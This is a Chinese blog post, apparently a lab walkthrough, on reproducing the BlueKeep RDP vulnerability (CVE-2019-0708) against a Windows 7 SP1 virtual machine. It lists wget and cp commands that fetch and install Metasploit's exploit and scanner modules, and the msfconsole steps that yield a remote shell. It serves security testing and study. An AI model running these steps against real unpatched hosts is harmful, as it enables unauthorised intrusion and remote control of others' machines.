CVE-2019-0708复现

先传送篇文章:CVE-2019-0708漏洞复现及修复补丁
CVE-2019-0708 远程桌面代码执行漏洞复现

在进行复现之前先对kali进行更新,这里的测试环境是kali和win7sp1(在对其他版本的win7,以及server2008都只出现蓝屏,不能对其控制)

复现过程:
1、下载在kali上下载四个脚本命令如下:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

2、脚本复制到kali的对应位置:

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

3、重启数据库:
service postgresql restart
4、启动msf,然后输入命令reload_all,加载模块:
5、加载攻击模块:
在这里插入图片描述
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述
这里的rhost是win7sp1, target 选择1
在这里插入图片描述
run一下,成功拿到shell
在这里插入图片描述

总结:
1)本次复现使用的是win7sp1,测试过win7的其他版本,以及server2008,都只是出现蓝屏。
2)几个模块第一次放到指定文件夹位置的时可能会出现问题,出现下面这个问题需要重新写入
在这里插入图片描述
3)注意这里使用的vm虚拟机,使用的target1,其他几个出现蓝屏

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值